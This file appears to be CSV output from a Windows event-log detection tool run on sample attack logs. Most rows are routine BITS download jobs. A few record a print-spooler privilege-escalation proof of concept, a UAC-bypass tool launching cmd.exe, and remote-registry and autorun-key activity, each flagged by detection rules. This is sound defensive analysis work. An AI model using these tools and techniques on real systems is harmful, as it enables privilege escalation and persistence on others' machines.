2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe  :  URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe  payload.dll  :  Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe  :  User: 3B\lgreen  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe  :  Path: C:\Windows\System32\spoolsv.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe  :  Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0)  :  Path: C:\Windows\System32\taskhostw.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
